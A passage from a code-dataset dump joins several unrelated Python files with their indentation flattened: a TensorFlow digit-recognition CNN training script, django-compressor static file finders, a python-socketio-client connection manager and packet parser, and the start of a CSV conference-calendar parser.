ret = Translation(" ")
print(ret)
```
#### File: VideoSubScanPlayer/VideoSubScanPlayer/CNN_new.py
```python
import tensorflow as tf
import os
import numpy as np
import random
from PIL import Image
import cv2 as cv
import time
"""
各类模型代码以及训练代码
"""
image_size = 64
# all:33-127, 0-9:48-58
start = 48
end = 58
category = end - start
# 用于存放数据集的字典,字典格式 路径:ascii值
train_list = []
test_list = []
train_rate = 0.90 #13818
# 提供数据集路径
file_dir = "G:\\Code\\Python\\digital_imgae_processing_design\\dataset\\"
asciiList = [str(index) for index in range(start, end)]
# 获取所有数据的路径存在file_list字典
for index, numStr in enumerate(asciiList):
file_name_list = os.listdir(file_dir + numStr + '\\')
file_list = []
for name in file_name_list:
file_list.append([name, index + start])
# 打乱
random.shuffle(file_list)
# 按分配率来分配
train_length = int(len(file_list) * train_rate)
train_list += file_list[0: train_length + 1]
test_list += file_list[train_length + 1:]
X = tf.placeholder(tf.float32, [None, 64 * 64])
Y = tf.placeholder(tf.float32, [None, category])
keep_prob = tf.placeholder(tf.float32)
def getRandomData(sample_list,batch_num):
# 传入batch_num为一次性返回的样本标签数量
# 随机获取指定数量的image和label
# 返回的数据 image为one-hot np-array,维度 【batch_num, image总像素】
# label为01矩阵,维度[batch_num, classes] 其中正确标签为1,
image_batch = []
label_batch = []
# 从读取好的字典中随机读取指定数量的数据
elements = random.sample(sample_list, batch_num)
# print(elements)
for item in elements:
name = item[0]
id = item[1]
# 将读取的图片转换为nd-array格式,并将长度reshape成一维向量
# 图片先用Image工具读取,再用numpy转换,然后转换为二值图,再定为one-hot
img = Image.open(file_dir + str(id) + "\\" + name)
image_batch.append(Nomalize(np.array(img.convert("L")), 128).reshape([image_size ** 2]))
label_array = [0] * (end - start)
label_array[id - start] = 1
label_batch.append(label_array)
# 将转换好的元素转换为nd-array格式
image_batch = np.array(image_batch)
label_batch = np.array(label_batch)
# print(image_batch.shape)
# print(label_batch.shape)
return image_batch, label_batch
def getDataBatch(sample_list, batch_num):
# 传入batch_num为一次性返回的样本标签数量
# 获取指定长度的数量
# 返回的数据 image为one-hot np-array,维度 【batch_num, image总像素】
# label为01矩阵,维度[batch_num, classes] 其中正确标签为1,
# 注: 不断出队确保了每次取样本都不会重复,但是别越界了。
# 测试情况下,94 * 21 = 1974样本,总样本不要超过这个值
image_batch = []
label_batch = []
# 从读取好的字典中读取指定数量的数据,按顺序
elements = []
for i in range(batch_num):
elements.append(sample_list.pop(0))
for item in elements:
name = item[0]
id = item[1]
# 将读取的图片转换为nd-array格式,并将长度reshape成一维向量
# 图片先用Image工具读取,再用numpy转换,然后转换为二值图,再定为one-hot
img = Image.open(file_dir + str(id) + "\\" + name)
image_batch.append(Nomalize(np.array(img.convert("L")), 128).reshape([image_size ** 2]))
label_array = [0] * (end - start)
label_array[id - start] = 1
label_batch.append(label_array)
# 将转换好的元素转换为nd-array格式
image_batch = np.array(image_batch)
label_batch = np.array(label_batch)
# print(image_batch.shape)
# print(label_batch.shape)
return image_batch, label_batch
def getRealData():
# 获取真实分割的测试数据
test_dir = "chuli\\"
file_name_list = os.listdir(test_dir)
data = []
for id, name in enumerate(file_name_list):
image_path = test_dir + name
img = Image.open(image_path)
img_np = Nomalize(np.array(img.convert("L")), 128).reshape([image_size ** 2])
data.append([img_np,id])
return data
def convert_pic(imgPath):
# 把图片转为numpy 【64*64】
img = Image.open(imgPath)
print(img)
row,col = img.size
img = cv.imread(imgPath,0)
cv.imshow('img',img)
# image = cv.cvtColor(np.asarray(img), cv.COLOR_RGB2GRAY)
# rate = int((64*row)/col)
# image = cv.resize(image,(0,0),fx = row*rate, fy = 64)
# cv.imshow('img',image)
cv.waitKey(0)
def Nomalize(array, value):
row, col = array.shape
for i in range(row):
for j in range(col):
if array[i][j] > value:
array[i][j] = 1
else:
array[i][j] = 0
return array
def ascii_cnn():
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 2 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 64], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([64]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
w_c2 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([128]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*64
# w_c3 = tf.Variable(tf.random_normal([3, 3, 128, 256], stddev = 0.01))
# b_c3 = tf.Variable(tf.zeros([256]))
# conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
# conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# conv3 = tf.nn.dropout(conv3, keep_prob)
# 全连接层,8*8*128
w_d = tf.Variable(tf.random_normal([16 * 16 * 128, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv2, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, 94], stddev = 0.01))
b_out = tf.Variable(tf.zeros([94]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M4_sub():
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 2 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([32]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*64
w_c2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([64]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 全连接层,16*16*128
w_d = tf.Variable(tf.random_normal([16 * 16 * 64, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv2, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M4_plus():
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 输入64 * 64 卷积层 C1
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 64], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([64]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*64 卷积层 C2
w_c2 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([128]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 全连接层,16*16*128
w_d = tf.Variable(tf.random_normal([16 * 16 * 128, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv2, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
# 全连接层,1024 -> 90
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M5_plus():
# M5+ 64-128-256-2fc
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 3 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 64], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([64]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*64
w_c2 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([128]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*128
w_c3 = tf.Variable(tf.random_normal([3, 3, 128, 256], stddev = 0.01))
b_c3 = tf.Variable(tf.zeros([256]))
conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv3 = tf.nn.dropout(conv3, keep_prob)
# 全连接层,8*8*256
w_d = tf.Variable(tf.random_normal([8 * 8 * 256, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv3, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M5_sub():
# M5- 32-64-128-2fc
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 3 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([32]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*32
w_c2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([64]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*64
w_c3 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c3 = tf.Variable(tf.zeros([128]))
conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv3 = tf.nn.dropout(conv3, keep_prob)
# 全连接层,8*8*128
w_d = tf.Variable(tf.random_normal([8 * 8 * 128, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv3, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M6_sub():
# M6- 32-64-128-256-2fc
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 4 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([32]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*32
w_c2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([64]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*64
w_c3 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c3 = tf.Variable(tf.zeros([128]))
conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv3 = tf.nn.dropout(conv3, keep_prob)
# 8*8*128
w_c4 = tf.Variable(tf.random_normal([3, 3, 128, 256], stddev = 0.01))
b_c4 = tf.Variable(tf.zeros([256]))
conv4 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv3, w_c4, strides = [1, 1, 1, 1], padding = 'SAME'), b_c4))
conv4 = tf.nn.max_pool(conv4, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv4 = tf.nn.dropout(conv4, keep_prob)
# 全连接层,4*4*256
w_d = tf.Variable(tf.random_normal([4 * 4 * 256, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv4, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M6_plus():
# M6+ 40-80-160-320-2fc
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 4 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 40], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([40]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*40
w_c2 = tf.Variable(tf.random_normal([3, 3, 40, 80], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([80]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*80
w_c3 = tf.Variable(tf.random_normal([3, 3, 80, 160], stddev = 0.01))
b_c3 = tf.Variable(tf.zeros([160]))
conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv3 = tf.nn.dropout(conv3, keep_prob)
# 8*8*160
w_c4 = tf.Variable(tf.random_normal([3, 3, 160, 320], stddev = 0.01))
b_c4 = tf.Variable(tf.zeros([320]))
conv4 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv3, w_c4, strides = [1, 1, 1, 1], padding = 'SAME'), b_c4))
conv4 = tf.nn.max_pool(conv4, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv4 = tf.nn.dropout(conv4, keep_prob)
# 全连接层,4*4*256
w_d = tf.Variable(tf.random_normal([4 * 4 * 320, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv4, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def train_cnn(output):
# output = ascii_cnn()
loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(logits = output, labels = Y))
optimizer = tf.train.AdamOptimizer(learning_rate = 0.001).minimize(loss)
accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(output, 1), tf.argmax(Y, 1)), tf.float32))
# 创建saver用于保存模型
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver.restore(sess, "./model/")
acc = 0.0
for i in range(2000):
image_batch, label_batch = getRandomData(train_list, 300)
sess.run([optimizer, loss],feed_dict = {X: image_batch, Y: label_batch, keep_prob: 0.5})
print("\r正在训练第 %d 步 ,最近一次测试准确率为%f, 每 5 步更新一次准确率"%(i+1,acc), end="")
if (i+1)%5==0:
image_batch, label_batch = getRandomData(test_list, 200)
acc = accuracy.eval({X: image_batch, Y: label_batch, keep_prob: 1.})
# print("训练第%d步,准确率为:%f"%(i+1,acc))
# if (i+1)%200==0:
# saver.save(sess, "./model2/")
# saver.restore(sess, "./model/")
print("\n----训练完毕,正在进行十次测试----")
nums = []
for i in range(10):
image_batch, label_batch = getRandomData(test_list, 249)
acc = accuracy.eval({X: image_batch, Y: label_batch, keep_prob: 1.})
nums.append(acc)
print("第%d次测试结果:%f"%(i+1,acc))
print(nums)
ac = (np.mean(nums))
print("测试完毕,平均准确率为:%f" % ac)
return ac
def test_cnn(output):
# 创建saver用于保存模型
saver = tf.train.Saver()
accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(output, 1), tf.argmax(Y, 1)), tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver.restore(sess, "./model/")
for i in range(10):
image_batch, label_batch = getRandomData(test_list, 249)
acc = accuracy.eval({X: image_batch, Y: label_batch, keep_prob: 1.})
print("第%d次测试结果:%f"%(i+1,acc))
def tesify_model(output):
ac_list = []
for i in range(5):
print("--------第%d次模型测试---------" % (i+1))
t1 = time.time()
ac = train_cnn(output)
ac_list.append(ac)
t2 = time.time()
print("第%d次模型测试 消耗时间: %f" % (i+1, t2 - t1))
print(ac_list)
print(np.mean(ac_list))
if __name__ == '__main__':
Model5_plus = M5_plus()
train_cnn(Model5_plus)
# getRandomData(1)
# getDataBatch(2)
# convert_pic("G:/Java资料/Code/Python/digital_imgae_processing_design/data_test/test2/0.jpg")
```
|
{
"source": "jezeniel/django-compressor-parceljs",
"score": 2
}
|
#### File: django-compressor-parceljs/compressor/finders.py
```python
from compressor.utils import staticfiles
from compressor.storage import CompressorFileStorage
import os
from django.conf import settings
from django.core.files.storage import (
FileSystemStorage,
)
from collections import OrderedDict
from django.core.checks import Error
from django.utils._os import safe_join
from django.contrib.staticfiles import utils
class CompressorFinder(staticfiles.finders.BaseStorageFinder):
"""
A staticfiles finder that looks in COMPRESS_ROOT
for compressed files, to be used during development
with staticfiles development file server or during
deployment.
"""
storage = CompressorFileStorage
def list(self, ignore_patterns):
return []
searched_locations = []
class PrivateFileSystemFinder(staticfiles.finders.BaseFinder):
"""
A static files finder that uses the ``COMPRESS_PRIVATE_DIRS`` setting
to locate files.
"""
def __init__(self, app_names=None, *args, **kwargs):
# List of locations with static files
self.locations = []
# Maps dir paths to an appropriate storage instance
self.storages = OrderedDict()
for root in settings.COMPRESS_PRIVATE_DIRS:
if isinstance(root, (list, tuple)):
prefix, root = root
else:
prefix = ''
if (prefix, root) not in self.locations:
self.locations.append((prefix, root))
for prefix, root in self.locations:
filesystem_storage = FileSystemStorage(location=root)
filesystem_storage.prefix = prefix
self.storages[root] = filesystem_storage
super().__init__(*args, **kwargs)
def check(self, **kwargs):
errors = []
if not isinstance(settings.COMPRESS_PRIVATE_DIRS, (list, tuple)):
errors.append(Error(
'The COMPRESS_PRIVATE_DIRS setting is not a tuple or list.',
hint='Perhaps you forgot a trailing comma?',
id='staticfiles.E001',
))
for root in settings.COMPRESS_PRIVATE_DIRS:
if isinstance(root, (list, tuple)):
prefix, root = root
if prefix.endswith('/'):
errors.append(Error(
'The prefix %r in the COMPRESS_PRIVATE_DIRS setting must '
'not end with a slash.' % prefix,
id='staticfiles.E003',
))
if settings.STATIC_ROOT and os.path.abspath(settings.STATIC_ROOT) == os.path.abspath(root):
errors.append(Error(
'The COMPRESS_PRIVATE_DIRS setting should not contain the '
'STATIC_ROOT setting.',
id='staticfiles.E002',
))
return errors
def find(self, path, all=False):
"""
Look for files in the extra locations as defined in PRIVATE_DIRS.
"""
matches = []
for prefix, root in self.locations:
if root not in searched_locations:
searched_locations.append(root)
matched_path = self.find_location(root, path, prefix)
if matched_path:
if not all:
return matched_path
matches.append(matched_path)
return matches
def find_location(self, root, path, prefix=None):
"""
Find a requested static file in a location and return the found
absolute path (or ``None`` if no match).
"""
if prefix:
prefix = '%s%s' % (prefix, os.sep)
if not path.startswith(prefix):
return None
path = path[len(prefix):]
path = safe_join(root, path)
if os.path.exists(path):
return path
def list(self, ignore_patterns):
"""
List all files in all locations.
"""
for prefix, root in self.locations:
storage = self.storages[root]
for path in utils.get_files(storage, ignore_patterns):
yield path, storage
```
|
{
"source": "jezeniel/python-socketio-client",
"score": 2
}
|
#### File: python-socketio-client/socketio_client/manager.py
```python
from engineio_client.emitter import Emitter
from engineio_client.client import Client as EngineIOClient
from engineio_client.utils import format_long
from .parser import Parser, ParserException, PacketException
from .socket import Socket
import gevent
import logging
logger = logging.getLogger(__name__)
class Manager(Emitter):
def __init__(self, scheme, hostname, port, reconnection=True, reconnection_delay=3.0,
auto_connect=True, parser=None, **kwargs):
"""
scheme: URI scheme
hostname: Hostname of the server
port: Port of the server
reconnection: Automatically reconnect after disconnect
reconnection_delay: How long to wait between reconnections float in seconds
auto_connect: Automatically connect at creation
"""
super(Manager, self).__init__()
self.scheme = scheme
self.hostname = hostname
self.port = port
self.reconnection = reconnection
self.reconnection_delay = reconnection_delay
self.auto_connect = auto_connect
self.parser = parser or Parser()
self.engine_kwargs = kwargs
self.engine_kwargs.setdefault('path', '/socket.io')
self.state = 'closed'
self.sockets = set()
self.engine = None
self.reconnecting = False
self.skipping_reconnect = False
self.reconnect_task = False
if self.auto_connect:
self.connect()
def setup_engine_handlers(self):
self.engine.on('open', self.handle_open)
self.engine.on('error', self.handle_error)
self.engine.on('message', self.handle_message)
self.engine.on('close', self.handle_close)
def cleanup_engine_handlers(self):
self.engine.off('open', self.handle_open)
self.engine.off('error', self.handle_error)
self.engine.off('message', self.handle_message)
self.engine.off('close', self.handle_close)
def connect(self):
if self.state in ['opening', 'open']:
return
self.state = 'opening'
self.skip_reconnect(False)
self.engine = EngineIOClient(self.scheme, self.hostname, self.port, **self.engine_kwargs)
self.setup_engine_handlers()
self.engine.open()
def disconnect(self):
logger.debug("Disconnecting")
self.reconnecting = False
self.skip_reconnect(True)
self.state = 'closing'
if self.engine:
self.engine.close()
def send_packet(self, packet):
logger.debug(format_long("Sending packet: %s", packet))
items = self.parser.encode(packet)
binary = False
for item in items:
self.engine.send(item, binary)
binary = True # Attachments are always considered binary
def socket(self, namespace):
return Socket(namespace, self)
def attach_socket(self, socket):
self.sockets.add(socket)
def detach_socket(self, socket):
logger.debug("Detach socket")
self.sockets.discard(socket)
if not self.sockets:
self.disconnect()
@property
def id(self):
return self.engine.id
def handle_open(self):
if self.state == 'opening':
logger.debug("Connected")
self.state = 'open'
self.emit('open')
if self.reconnecting:
self.emit('reconnect')
self.reconnecting = False
def handle_error(self, error):
if self.state == 'opening':
logger.warning("Connect error")
self.state = 'closed'
self.emit('connect_error', error)
if self.reconnecting:
logger.warning("Reconnect error")
self.emit('reconnect_error', error)
self.reconnecting = False
self.reconnect()
elif self.reconnection:
self.reconnect()
else:
logger.warning("Error: %s", error)
self.emit('error', error)
def handle_message(self, message):
if self.state != 'open':
return
try:
packet = self.parser.decode(message)
if packet:
self.handle_packet(packet)
except (ParserException, PacketException) as e:
logger.warning("Received invalid message or sequence, ignoring: %s", e)
def handle_packet(self, packet):
if self.state != 'open':
return
logger.debug(format_long("Received packet: %s", packet))
self.emit('packet', packet)
def handle_close(self):
logger.debug("Handle close")
if self.state != 'closing' and self.state != 'open':
return
logger.debug("Disconnected")
self.state = 'closed'
self.emit('close')
self.cleanup_engine_handlers()
if self.reconnection:
self.reconnect()
def skip_reconnect(self, value):
self.skipping_reconnect = value
if self.skipping_reconnect:
self.stop_task(self.reconnect_task)
def do_reconnect(self):
if self.state in ['opening', 'open']:
return
logger.debug("Reconnect")
self.connect()
def reconnect(self):
logger.debug("Delay reconnect")
if self.reconnecting:
logger.debug("Already reconnecting")
return
if self.skipping_reconnect:
logger.debug("Skipping reconnect because user disconnected")
return
self.reconnecting = True
self.reconnect_task = self.start_task(self.do_reconnect, delay=self.reconnection_delay)
def start_task(self, func, delay=0, *args, **kwargs):
return gevent.spawn_later(delay, func, *args, **kwargs)
def stop_task(self, task):
if task:
task.kill(False)
```
#### File: python-socketio-client/socketio_client/parser.py
```python
from engineio_client.emitter import Emitter
import six
import re
import json
import functools
import logging
logger = logging.getLogger(__name__)
class Packet(object):
CONNECT = 0
DISCONNECT = 1
EVENT = 2
ACK = 3
ERROR = 4
BINARY_EVENT = 5
BINARY_ACK = 6
def __init__(self, type=None, data=None, namespace=None, id=None):
self.type = type
self.data = data
self.namespace = namespace or '/'
self.id = id
@property
def type_string(self):
return {
self.CONNECT: 'connect',
self.DISCONNECT: 'disconnect',
self.EVENT: 'event',
self.ACK: 'ack',
self.ERROR: 'error',
self.BINARY_EVENT: 'binary_event',
self.BINARY_ACK: 'binary_ack'
}[self.type]
def __str__(self):
return ' - '.join([str(i) for i in [self.type_string, self.id, self.namespace, self.data] if i])
PATTERN = '^'
PATTERN += '([0-6])' # type
PATTERN += '(?:(\d+)-)?' # number of attachments (optional)
PATTERN += '(?:(/[^,]+),?)?' # namespace (optional)
PATTERN += '(\d*)' # message id (optional)
PATTERN += '(.*)' # data
PATTERN += '$'
class Parser(object):
def __init__(self):
self.reset()
def reset(self):
self.packet = None
self.raw_data = None
self.num_attachments = 0
self.attachments = []
def decode(self, bytes):
if not self.packet:
packet_type, num_attachments, namespace, packet_id, data = self.decode_packet(bytes)
self.packet = Packet(type=packet_type, namespace=namespace, id=packet_id)
self.raw_data = data
self.num_attachments = num_attachments
else:
self.attachments.append(bytes)
if self.num_attachments != len(self.attachments):
return None
packet = self.packet
packet.data = self.construct_data(self.raw_data, self.attachments)
self.reset()
return packet
def decode_packet(self, bytes):
matches = re.findall(PATTERN, bytes)
if not matches:
raise ParserException("Decoded packet is invalid: %s" % repr(bytes))
items = matches[0]
packet_type = int(items[0])
num_attachments = int(items[1]) if items[1] else 0
namespace = items[2]
packet_id = int(items[3]) if items[3] else None
data = json.loads(items[4]) if items[4] else None
return packet_type, num_attachments, namespace, packet_id, data
def construct_data(self, data, attachments):
ret = data
if isinstance(data, list):
ret = [self.construct_data(item, attachments) for item in data]
elif isinstance(data, dict):
if data.get('_placeholder', False) and 0 <= data.get('num', -1) < len(attachments):
ret = bytearray(attachments[data['num']])
else:
ret = {key: self.construct_data(value, attachments) for key, value in six.iteritems(data)}
return ret
def encode(self, packet):
bytes = six.text_type()
data, attachments = self.deconstruct_data(packet.data)
if attachments:
bytes += six.text_type(len(attachments)) + '-'
if packet.type == Packet.EVENT:
packet.type = Packet.BINARY_EVENT
elif packet.type == Packet.ACK:
packet.type = Packet.BINARY_ACK
bytes = six.text_type(packet.type) + bytes
if packet.namespace and packet.namespace != '/':
bytes += packet.namespace
if packet.id or data:
bytes += ','
if packet.id is not None:
bytes += six.text_type(packet.id)
if data is not None:
bytes += json.dumps(data, separators=(',', ':'))
return [bytes] + attachments
def deconstruct_data(self, data, attachments=None):
if attachments is None:
attachments = []
ret = data
if isinstance(data, bytearray):
attachments.append(data)
ret = {'_placeholder': True, 'num': len(attachments) - 1}
elif isinstance(data, (tuple, list)):
ret = [self.deconstruct_data(item, attachments)[0]
for item in data]
elif isinstance(data, dict):
ret = {key: self.deconstruct_data(value, attachments)[0]
for key, value in six.iteritems(data)}
return ret, attachments
class ParserException(Exception):
pass
class PacketException(Exception):
pass
```
|
{
"source": "jezhiggins/conference-calendar",
"score": 3
}
|
#### File: jezhiggins/conference-calendar/csv_calendar.py
```python
from typing import Set
from datetime import date
from csv import DictReader
from models import Event
HEADER_NAMES = ['start_date', 'end_date', 'title', 'website', 'description']
class MalformedCSV(Exception):
"""
Raised if the input CSV is malformed.
"""
def parse_events(csv_file):
return CsvParser(csv_file).parse_events()
class CsvParser:
